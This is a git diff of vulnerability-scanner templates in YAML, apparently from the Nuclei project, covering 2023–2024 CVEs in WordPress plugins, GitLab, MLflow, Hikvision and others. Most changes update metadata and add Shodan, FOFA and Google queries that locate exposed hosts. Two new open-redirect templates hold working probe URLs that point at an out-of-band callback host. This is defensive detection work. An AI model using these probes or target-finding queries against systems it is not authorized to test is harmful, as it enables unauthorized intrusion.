bcfcddafca..06a1916b28 100644 --- a/http/cves/2023/CVE-2023-6634.yaml +++ b/http/cves/2023/CVE-2023-6634.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6634 cwe-id: CWE-77 - epss-score: 0.16476 - epss-percentile: 0.95874 + epss-score: 0.18881 + epss-percentile: 0.9624 cpe: cpe:2.3:a:thimpress:learnpress:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,8 +27,10 @@ info: vendor: thimpress product: learnpress framework: wordpress + shodan-query: http.html:/wp-content/plugins/learnpress + fofa-query: body=/wp-content/plugins/learnpress publicwww-query: "/wp-content/plugins/learnpress" - tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive + tags: wpscan,cve,cve2023,wordpress,wp,wp-plugin,learnpress,rce,intrusive,thimpress variables: oast: "{{interactsh-url}}/?" padstr: "{{randstr}}" @@ -58,4 +60,4 @@ http: - "contains(body_1, '<pre>{{randstr}}</pre>') " - "status_code == 200" condition: and -# digest: 4a0a00473045022100c9994c66149f4a5bf4f57eb82447c380b3f1676950538da499834183bc73a10d022003e36af3fb7e71968c37a7a3cbde7b2fd89d97f0bc0dd4827b652838616db3ab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022026689095008d97443714c14e2be78edc8e3db1d76582dfbe7bc7788df0e65d8b0221008483dfaf8c8aa92d86274a31ded2fb48fe415afa35a9da3cbbbf8a1aee660698:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml new file mode 100644 index 0000000000..088a1553cd --- /dev/null +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -0,0 +1,32 @@ +id: CVE-2023-6786 + +info: + name: Payment Gateway for Telcell < 2.0.4 - Open Redirect + author: securityforeveryone + severity: medium + description: | + The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue + remediation: | + Fixed in 2.0.4 + reference: + - https://wpscan.com/vulnerability/f3e64947-3138-4ec4-86c4-27b5d6a5c9c2/ + - https://nvd.nist.gov/vuln/detail/CVE-2023-6786 + classification: + cve-id: CVE-2023-6786 + metadata: + max-request: 1 + verified: true + publicwww-query: "/wp-content/plugins/payment-gateway-for-telcell" + tags: cve,cve2023,wordpress,redirect,wp-plugin,wp,payment-gateway-for-telcell + +http: + - method: GET + path: + - "{{BaseURL}}/wp-admin/admin.php?page=wc-settings&action=redirect_telcell_form&api_url=https://oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' +# digest: 4a0a00473045022100c54d339267c2f658fd113dc4fd0acbaeaa55f4b62b90801f44b112a81c3526450220443bf6993f842ca3211aebb721c05472fee7856743f6d1b666eb06e7ad644eba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6831.yaml b/http/cves/2023/CVE-2023-6831.yaml index c20de4ecb6..0305cfaf4c 100644 --- a/http/cves/2023/CVE-2023-6831.yaml +++ b/http/cves/2023/CVE-2023-6831.yaml @@ -16,9 +16,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H cvss-score: 8.1 cve-id: CVE-2023-6831 - cwe-id: CWE-22 - epss-score: 0.00046 - epss-percentile: 0.12693 + cwe-id: CWE-22,CWE-29 + epss-score: 0.00207 + epss-percentile: 0.58698 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -26,6 +26,10 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,pathtraversal,lfprojects,intrusive http: @@ -59,4 +63,4 @@ http: - type: status status: - 500 -# digest: 4a0a004730450220562372b84037c253793b1361644b96eee1ccba93418d5cd737d3aaa998b804ec0221008a4a73e79fa7039b979a9897d901eef7dc19a6503ac32ff803a078f3c61485f7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021fbebaa88ab1755114b7966a9f7a1cea58912f8b304515cab004679a5691d3e02200b73631111984f9659dd5aafeb2ceabf1b746bbd81eae1bda187053ddfc48da1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6875.yaml b/http/cves/2023/CVE-2023-6875.yaml index 5bfecacd98..c109fc26d9 100644 --- a/http/cves/2023/CVE-2023-6875.yaml +++ b/http/cves/2023/CVE-2023-6875.yaml @@ -18,8 +18,8 @@ info: cvss-score: 9.8 cve-id: CVE-2023-6875 cwe-id: CWE-862 - epss-score: 0.04263 - epss-percentile: 0.92089 + epss-score: 0.05153 + epss-percentile: 0.92961 cpe: cpe:2.3:a:wpexperts:post_smtp_mailer:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -27,8 +27,10 @@ info: vendor: wpexperts product: post_smtp_mailer framework: wordpress + shodan-query: http.html:/wp-content/plugins/post-smtp + fofa-query: body=/wp-content/plugins/post-smtp publicwww-query: "/wp-content/plugins/post-smtp" - tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass + tags: cve,cve2023,wp,wp-plugin,wordpress,smtp,mailer,auth-bypass,wpexperts variables: fcm_token: "{{randstr_1}}" device: "{{randstr_2}}" @@ -64,4 +66,4 @@ http: - 'contains_all(body_2, "success\":true,", "{\"fcm_token\":\"{{fcm_token}}")' - 'contains_all(body_3, "true,\"data\":", "access_token=")' condition: and -# digest: 4a0a00473045022100df1311e0648c5c0c2297cad9b5527b9c111d611cf4b9f990fdea564c1ff5c4cc02202ce1f58dc34dd57604eef2926b33b969069290c0f03ffabb7af0be0f90fea60c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210084ea25bc632778a481dd0545166e1484a4a3d1a752ada7e2a783adc2c7be5495022100dc5775f2bbc435230438bf01cbe56acfe2ed80489b51dfce16a6e14111069e20:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6895.yaml b/http/cves/2023/CVE-2023-6895.yaml index 034e26941e..30725264c4 100644 --- a/http/cves/2023/CVE-2023-6895.yaml +++ b/http/cves/2023/CVE-2023-6895.yaml @@ -9,19 +9,23 @@ info: reference: - https://vuldb.com/?ctiid.248254 - https://vuldb.com/?id.248254 + - https://github.com/tanjiti/sec_profile + - https://github.com/wy876/POC + - https://github.com/xingchennb/POC- classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6895 cwe-id: CWE-78 - epss-score: 0.0008 - epss-percentile: 0.33389 + epss-score: 0.89707 + epss-percentile: 0.9876 cpe: cpe:2.3:o:hikvision:intercom_broadcast_system:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: hikvision product: intercom_broadcast_system + shodan-query: http.favicon.hash:"-1830859634" fofa-query: "icon_hash=\"-1830859634\"" tags: cve,cve2023,hikvision,rce @@ -55,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b5522ab583b393cf6a360b2e58dae29b4681cb2fefa1f6ad38518b6dc74c829c022013094391177663822a780dcd082911844f772129caea17c943068a4037e24e71:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100873e667f79525849dce90cee9fef344f9cede1e176a67b4f6918f37d4a23e3b50220576cab131b3b6fe4305ffc0a3f677aeb1778b20ed6ea7df960fabb089bdedafa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6909.yaml b/http/cves/2023/CVE-2023-6909.yaml index fe4e77c554..9135a458f4 100644 --- a/http/cves/2023/CVE-2023-6909.yaml +++ b/http/cves/2023/CVE-2023-6909.yaml @@ -19,8 +19,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6909 cwe-id: CWE-29 - epss-score: 0.00409 - epss-percentile: 0.73387 + epss-score: 0.00494 + epss-percentile: 0.76167 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -28,7 +28,11 @@ info: vendor: lfprojects product: mlflow shodan-query: "http.title:\"mlflow\"" - tags: cve,cve2023,mlflow,lfi,intrusive + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" + tags: cve,cve2023,mlflow,lfi,intrusive,lfprojects http: - raw: @@ -94,4 +98,4 @@ http: json: - '.run.info.run_id' internal: true -# digest: 490a00463044022062e417739d10a0345e088ba046630f61c75a6fb7c2640786cae6d7fe70c113da0220798d1ffc7b82d974779f27319ed421eb30bafdb7d6a1dbc125edc69436bef5e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100db5504fc5ccec8cb533fd47b571ed5f305ea8139bb810af6027e28961ced040f02206640d8721c739138031e655a2f394b7ceda41c462823e52e45cf0ba23b260200:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6977.yaml b/http/cves/2023/CVE-2023-6977.yaml index 2eb799cbbc..6d226b50d1 100644 --- a/http/cves/2023/CVE-2023-6977.yaml +++ b/http/cves/2023/CVE-2023-6977.yaml @@ -18,8 +18,8 @@ info: cvss-score: 7.5 cve-id: CVE-2023-6977 cwe-id: CWE-29 - epss-score: 0.00409 - epss-percentile: 0.73387 + epss-score: 0.00494 + epss-percentile: 0.76167 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: verified: true @@ -27,6 +27,10 @@ info: vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" + fofa-query: + - title="mlflow" + - app="mlflow" + google-query: intitle:"mlflow" tags: cve,cve2023,mlflow,oss,lfi,intrusive,lfprojects http: @@ -65,4 +69,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502205c8c97c275094e88344019f80ab5824b9d657171e092d085f48ff32a61c3bcf2022100e3ee293e0e93fe88e0838ff2ab71274a68e6cd4ffdf9bc9f50e58b9bd30a4b11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221008702f8bb7a5c93868381e03fb38369b7d7a15d2001f06633b74279f1e482280b02210093a5a577ec94663ec705c50930361777c323c8252a7ae768227ee4a78542491b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-6989.yaml b/http/cves/2023/CVE-2023-6989.yaml index 9551426c51..09b7e8fc97 100644 --- a/http/cves/2023/CVE-2023-6989.yaml +++ b/http/cves/2023/CVE-2023-6989.yaml @@ -9,13 +9,14 @@ info: reference: - https://wpscan.com/vulnerability/a485aee7-39a0-418c-9699-9afc53e28f55/ - https://nvd.nist.gov/vuln/detail/CVE-2023-6989 + - https://github.com/fkie-cad/nvd-json-data-feeds classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2023-6989 cwe-id: CWE-22 - epss-score: 0.00282 - epss-percentile: 0.68187 + epss-score: 0.11562 + epss-percentile: 0.95251 cpe: cpe:2.3:a:getshieldsecurity:shield_security:*:*:*:*:*:wordpress:*:* metadata: verified: true @@ -23,8 +24,10 @@ info: vendor: getshieldsecurity product: shield_security framework: wordpress + shodan-query: http.html:/wp-content/plugins/wp-simple-firewall + fofa-query: body=/wp-content/plugins/wp-simple-firewall publicwww-query: "/wp-content/plugins/wp-simple-firewall" - tags: cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security + tags: wpscan,cve,cve2023,wp,wordpress,wp-plugin,lfi,shield-security,getshieldsecurity http: - raw: @@ -53,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204e4cce5ccdd9c3c04b71aa1cd58280c033c6855be762519af8ea28b91bf131ce022100e41638a64a0ddab0bd7492d519772ad577c9420c807c3f5c34cfc69d01b923c8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205a17df05a5919ecaed61f2ff2fa97b35c5837b3faeacc17c8fa58e1a36117922022100d5bd45067c0fcd14a7bf2caeb7d39376091b6ae3cc5da4216d635e3fb53d0cc6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2023/CVE-2023-7028.yaml b/http/cves/2023/CVE-2023-7028.yaml index 221abe6746..7b9d652156 100644 --- a/http/cves/2023/CVE-2023-7028.yaml +++ b/http/cves/2023/CVE-2023-7028.yaml @@ -3,7 +3,7 @@ id: CVE-2023-7028 info: name: GitLab - Account Takeover via Password Reset author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch - severity: critical + severity: high description: | An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address. reference: @@ -11,19 +11,27 @@ info: - https://x.com/rwincey/status/1745659710089437368?s=20 - https://gitlab.com/gitlab-org/gitlab/-/issues/436084 - https://hackerone.com/reports/2293343 + - https://github.com/V1lu0/CVE-2023-7028 classification: - cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N - cvss-score: 10 + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 cve-id: CVE-2023-7028 - cwe-id: CWE-284 + cwe-id: CWE-640,CWE-284 + epss-score: 0.95952 + epss-percentile: 0.99464 + cpe: cpe:2.3:a:gitlab:gitlab:*:*:*:*:community:*:*:* metadata: verified: true max-request: 6 vendor: gitlab product: gitlab - shodan-query: title:"Gitlab" - tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive - + shodan-query: + - title:"Gitlab" + - cpe:"cpe:2.3:a:gitlab:gitlab" + - http.title:"gitlab" + fofa-query: title="gitlab" + google-query: intitle:"gitlab" + tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive,kev flow: http(1) && http(2) http: @@ -68,4 +76,4 @@ http: - type: dsl dsl: - username -# digest: 4a0a004730450220463aa8f8060e3d37f8935e48c8c505f27a93a54e94298dfab55d23119670cb3c022100949c049141cf1a84318d7a48bddd617e314733ec8e6cabf27b140c8396816d9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fe706da29f53fa0b108713ef9f95c38b54a7481e7a91e1935b4a61b053972c320220348984153c3fabb194fc8d66770c796b3a32a7ebfd8f0a20d8eaf3b529aa2c84:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0195.yaml b/http/cves/2024/CVE-2024-0195.yaml index 0d421f8fc1..0a6d987908 100644 --- a/http/cves/2024/CVE-2024-0195.yaml +++ b/http/cves/2024/CVE-2024-0195.yaml @@ -10,22 +10,25 @@ info: - https://github.com/Shelter1234/VulneraLab/blob/main/SpiderFlow/CVE-2024-0195/README.zh-cn.md - https://vuldb.com/?id.249510 - https://nvd.nist.gov/vuln/detail/CVE-2024-0195 + - https://vuldb.com/?ctiid.249510 + - https://github.com/Tropinene/Yscanner classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2024-0195 cwe-id: CWE-94 - epss-score: 0.00107 - epss-percentile: 0.43423 + epss-score: 0.89846 + epss-percentile: 0.98769 cpe: cpe:2.3:a:ssssssss:spider-flow:0.4.3:*:*:*:*:*:*:* metadata: verified: true - max-request: 1 + max-request: 2 vendor: ssssssss - product: spider-flow - fofa-query: app="SpiderFlow" - tags: cve,cve2024,spiderflow,crawler,unauth,rce - + product: "spider-flow" + fofa-query: + - "app=\"SpiderFlow\"" + - app="spiderflow" + tags: cve,cve2024,spiderflow,crawler,unauth,rce,ssssssss flow: http(1) && http(2) http: @@ -54,4 +57,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4a0a004730450220745e8b365ef39550953f2e7c7ec479c97d618b53aca81aa2b4ca13122a21393e022100ca3f258bebf53fbde78835764d0418a8e96537a8c81731da03b8ef7429d65e6b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220441ad46885b455c236ce16bd52020d0f8f142b8b3c28f5eb9f4f2a683821342702207de3c7d603b1b1da12b5752330c2112c6411c15c8eaed0f87150be2c41d2959c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0200.yaml b/http/cves/2024/CVE-2024-0200.yaml index da0e5881ed..50bf2b71da 100644 --- a/http/cves/2024/CVE-2024-0200.yaml +++ b/http/cves/2024/CVE-2024-0200.yaml @@ -17,17 +17,19 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0200 cwe-id: CWE-470 - epss-score: 0.0037 - epss-percentile: 0.72517 + epss-score: 0.06844 + epss-percentile: 0.93885 cpe: cpe:2.3:a:github:enterprise_server:*:*:*:*:*:*:*:* metadata: - vendor: github - product: enterprise_server - shodan-query: title:"GitHub Enterprise" - fofa-query: app="Github-Enterprise" verified: true + max-request: 7 + vendor: github + product: "enterprise_server" + shodan-query: + - "title:\"GitHub Enterprise\"" + - micro focus dsd + fofa-query: "app=\"Github-Enterprise\"" tags: cve,cve2024,rce,github,enterprise - variables: username: "{{username}}" password: "{{password}}" @@ -141,4 +143,4 @@ http: part: interactsh_protocol words: - "dns" -# digest: 4b0a004830460221008cb530b7dece20ef5b28664e52e4b5123c761007f8a3021c46963b66706b95f8022100ba710c3a1d763987eb9872637d45f542155a84506b437d9e360f973235902443:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b55f6b1a271d5853e4388a493b7db6672febea3697dcd0649fbaf6c2538dcefc02201397c08ed2ecd60f4aac71bcf61b1f0b7e66f84146464a70ec4d9f7584e5725b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0204.yaml b/http/cves/2024/CVE-2024-0204.yaml index c32fd0979b..5a9a044b2b 100644 --- a/http/cves/2024/CVE-2024-0204.yaml +++ b/http/cves/2024/CVE-2024-0204.yaml @@ -17,18 +17,26 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0204 cwe-id: CWE-425 - epss-score: 0.53864 - epss-percentile: 0.97564 + epss-score: 0.50096 + epss-percentile: 0.97519 cpe: cpe:2.3:a:fortra:goanywhere_managed_file_transfer:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: fortra product: goanywhere_managed_file_transfer - shodan-query: http.favicon.hash:1484947000,1828756398,1170495932 - fofa-query: app="GoAnywhere-MFT" - zoomeye-query: app:"Fortra GoAnywhere-MFT" - tags: cve,cve2024,auth-bypass,goanywhere + shodan-query: + - http.favicon.hash:1484947000,1828756398,1170495932 + - http.favicon.hash:1484947000 + fofa-query: + - app="GoAnywhere-MFT" + - icon_hash=1484947000 + - icon_hash=1484947000,1828756398,1170495932 + - app="goanywhere-mft" + zoomeye-query: + - app:"Fortra GoAnywhere-MFT" + - app:"fortra goanywhere-mft" + tags: packetstorm,cve,cve2024,auth-bypass,goanywhere,fortra http: - method: GET @@ -47,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220581efe02eb9cd3ada112546fde3dc7479baecfc944f62b46161092c26a8ea386022100938435bdc92e8db29976fbb000eb51a136a70541574c87c832a83b2b1f87ced1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100aad72bb1daab1487638c2abf02e13adfb741ae7eed198c48c07e7f95c1968d06022072f7c69ebf26c71a1544dfc0d7e99b6051fc40e09615eb30904343822615b1a7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0235.yaml b/http/cves/2024/CVE-2024-0235.yaml index 27b99e3c20..4b3327d0f2 100644 --- a/http/cves/2024/CVE-2024-0235.yaml +++ b/http/cves/2024/CVE-2024-0235.yaml @@ -23,13 +23,23 @@ info: epss-percentile: 0.19233 cpe: cpe:2.3:a:myeventon:eventon:*:*:*:*:*:wordpress:*:* metadata: + max-request: 1 vendor: myeventon product: eventon framework: wordpress - shodan-query: vuln:CVE-2023-2796 - fofa-query: wp-content/plugins/eventon/ - publicwww-query: "/wp-content/plugins/eventon/" - tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan + shodan-query: + - "vuln:CVE-2023-2796" + - http.html:/wp-content/plugins/eventon-lite/ + - http.html:/wp-content/plugins/eventon/ + fofa-query: + - "wp-content/plugins/eventon/" + - body=/wp-content/plugins/eventon/ + - body=/wp-content/plugins/eventon-lite/ + publicwww-query: + - "/wp-content/plugins/eventon/" + - /wp-content/plugins/eventon-lite/ + google-query: "inurl:\"/wp-content/plugins/eventon/\"" + tags: cve,cve2024,wp,wordpress,wp-plugin,exposure,eventon,wpscan,myeventon http: - method: POST @@ -55,4 +65,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100dd24c1d6e69e4b09cfdd6e18d844c71fecf98df6be105ce2f3645b85146d64be0221009bd6cb83542aa43265c7f18b56ac9f07610b6cee11eafbf574dfb9dc05e30d88:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c9b0ad3fa93a5b4f9da91f43f446ebcbfebcc8b5ff4204c82656319ba2919c62022027c3257667f4775e2b409d1e8290be69f98cff8f6eaea854344451cd25dfd327:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0250.yaml b/http/cves/2024/CVE-2024-0250.yaml new file mode 100644 index 0000000000..c0fc49e587 --- /dev/null +++ b/http/cves/2024/CVE-2024-0250.yaml @@ -0,0 +1,35 @@ +id: CVE-2024-0250 + +info: + name: Analytics Insights for Google Analytics 4 < 6.3 - Open Redirect + author: securityforeveryone + severity: medium + description: | + The plugin is vulnerable to Open Redirect due to insufficient validation on the redirect oauth2callback.php file. This makes it possible for unauthenticated attackers to redirect users to potentially malicious sites if they can successfully trick them into performing an action. + remediation: | + Fixed in 6.3 + reference: + - https://wpscan.com/vulnerability/321b07d1-692f-48e9-a8e5-a15b38efa979/ + - https://github.com/fkie-cad/nvd-json-data-feeds + - https://nvd.nist.gov/vuln/detail/CVE-2024-0250 + classification: + epss-score: 0.00043 + epss-percentile: 0.0866 + metadata: + max-request: 1 + verified: true + fofa-query: body="/wp-content/plugins/analytics-insights" + publicwww-query: "/wp-content/plugins/analytics-insights" + tags: cve,cve2024,wpscan,redirect,wp,wp-plugin,wordpress,analytics-insights + +http: + - method: GET + path: + - "{{BaseURL}}/wp-content/plugins/analytics-insights/tools/oauth2callback.php?state=https://oast.me/%3f&code=x" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' +# digest: 4a0a004730450220508ba6949e0997c93c3e04a75108bac0d84fd29cdf91842239f76d788c8d60f9022100bb118773932c0732f921c1e1dca30fa00cf7826b60410268e292e051434a276a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0305.yaml b/http/cves/2024/CVE-2024-0305.yaml index 9305b5e307..626be7df96 100644 --- a/http/cves/2024/CVE-2024-0305.yaml +++ b/http/cves/2024/CVE-2024-0305.yaml @@ -18,17 +18,22 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2024-0305 - epss-score: 0.00796 - epss-percentile: 0.81232 + epss-score: 0.00947 + epss-percentile: 0.83122 cpe: cpe:2.3:a:ncast_project:ncast:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ncast_project product: ncast - fofa-query: app="Ncast-产品" && title=="高清智能录播系统" + shodan-query: http.title:"高清智能录播系统" + fofa-query: + - app="Ncast-产品" && title=="高清智能录播系统" + - title="高清智能录播系统" + - app="ncast-产品" && title=="高清智能录播系统" + google-query: intitle:"高清智能录播系统" zoomeye-query: title:"高清智能录播系统" - tags: cve,cve2024,ncast,rce + tags: cve,cve2024,ncast,rce,ncast_project http: - raw: @@ -51,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022015e3b88f751e5eecf33a42035bdf0113bdc40dab4f2bb7b7585a58b07a2a3f8c02205a2cf5822cfe9758202ab4fc426fb99e6e702ab31c6ebd5c14e720ae82d26a02:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3517deada4eccc530d06c496e5b8ab77011dd1ddb4d64a739531eba5da26af10221009e090cf57b6a36adeecf56bf92acce8a05cbd6443a90c85275376bb86d31fa1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0337.yaml b/http/cves/2024/CVE-2024-0337.yaml index 71b6600db2..639c6a0675 100644 --- a/http/cves/2024/CVE-2024-0337.yaml +++ b/http/cves/2024/CVE-2024-0337.yaml @@ -17,7 +17,7 @@ info: verified: true max-request: 1 publicwww-query: inurl:"/wp-content/plugins/travelpayouts" - tags: cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts + tags: wpscan,cve,cve2024,wp,wp-plugin,wordpress,redirect,travelpayouts http: - method: GET @@ -31,4 +31,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)oast\.me.*$' -# digest: 4a0a00473045022100b62074d8f68fb2cd5bca314322a65516a6df198a8b84351098fe13babf2af5680220740b91fd3dc325e68c28496b76f1c373dc916628237e0245cf337f693ca65fb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220181582ac93b72f27e977d2061f18ff05e3b5df811283cea693e6f70459ab7fb90221008a49810c8b6636aaef8a8678a28ed5d5204efe8af7cdfd25e42fee1f0617dea0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0352.yaml b/http/cves/2024/CVE-2024-0352.yaml index 3452a1685d..b9f84832b2 100644 --- a/http/cves/2024/CVE-2024-0352.yaml +++ b/http/cves/2024/CVE-2024-0352.yaml @@ -20,8 +20,8 @@ info: cvss-score: 9.8 cve-id: CVE-2024-0352 cwe-id: CWE-434 - epss-score: 0.01029 - epss-percentile: 0.82231 + epss-score: 0.0086 + epss-percentile: 0.82263 cpe: cpe:2.3:a:likeshop:likeshop:*:*:*:*:*:*:*:* metadata: verified: true @@ -29,6 +29,7 @@ info: vendor: likeshop product: likeshop shodan-query: http.favicon.hash:874152924 + fofa-query: icon_hash=874152924 tags: cve,cve2024,rce,file-upload,likeshop,instrusive,intrusive variables: filename: "{{rand_base(6)}}" @@ -61,4 +62,4 @@ http: part: body json: - ".data.url" -# digest: 4a0a00473045022100be04b8cac16a0577f0fc6b0022cf4994579f8d883c303f66f39ab4955412da3f02204f210d0cd8ce3c68975bcbc6d030680d926478b27dbc1781c253f4e0835ca650:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f918936fafffcf93421ce086207f2283925cd669ecc632d7ed2bc75094b855a802200fd6828f58d3fe1ed11a252d611b4b5a317e232fcc89bb3d80c103e17ea3ac4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-0713.yaml b/http/cves/2024/CVE-2024-0713.yaml index 67a8072a14..e001581a54 100644 --- a/http/cves/2024/CVE-2024-0713.yaml +++ b/http/cves/2024/CVE-2024-0713.yaml @@ -23,6 +23,7 @@ info: max-request: 2 vendor: monitorr product: monitorr + shodan-query: http.favicon.hash:"-211006074" fofa-query: "icon_hash=\"-211006074\"" tags: cve,cve2024,file-upload,intrusive,monitorr variables: @@ -66,4 +67,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201055181c903e98898674fdb23437eb0e90871b42745b5c0d4aad9e3129dddf11022100c04264cde1575aff618e4b83359fa39d048cb64fbc9c3adbced30e325768c289:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022016af05f7a274fef62184fc086ebac0841514101430fce427e95e9aa15c223517022100dd87df7dd84e55a5e3b39b9de16d58346c0e5a6560d565e40269582e738044f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2024/CVE-2024-1021.yaml b/http/cves/2024/CVE-2024-1021.yaml index d6858b9ce0..a0049c469b 100644 --- a/http/cves/2024/CVE-2024-1021.yaml +++ b/http/cves/2024/CVE-2024-1021.yaml @@ -21,16 +21,17 @@ info: cvss-score: 9.8 cve-id: CVE-2024-1021 cwe-id: CWE-918 - epss-score: 0.01163 - epss-percentile: 0.84597 + epss-score: 0.00973 + epss-percentile: 0.83349 cpe: cpe:2.3:a:ruifang-tech:rebuild:*:*:*:*:*:*:*:* metadata: verified: true max-request: 2 vendor: ruifang-tech product: rebuild + shodan-query: http.favicon.hash:"871154672" fofa-query: "icon_hash=\"871154672\"" - tags: cve2024,cve,rebuild,ssrf + tags: cve2024,cve,rebuild,ssrf,ruifang-tech http: - method: GET @@ -45,4 +46,4 @@ http: - '!contains(body_1, "<h1> Interactsh Server </h1>")' - 'status_code_2 == 200' condition: and -# digest: 4a0a0047304502210083066599f18b2c54a0a9076795f7d22b1ca8d8fad2c8f03a3147ec730c002e9702203386c976a8e99262651e52994ce6d95c2f342a0cc4e8518139df96275c9a03f0:922c64590222798bb761d5b6d8e72950 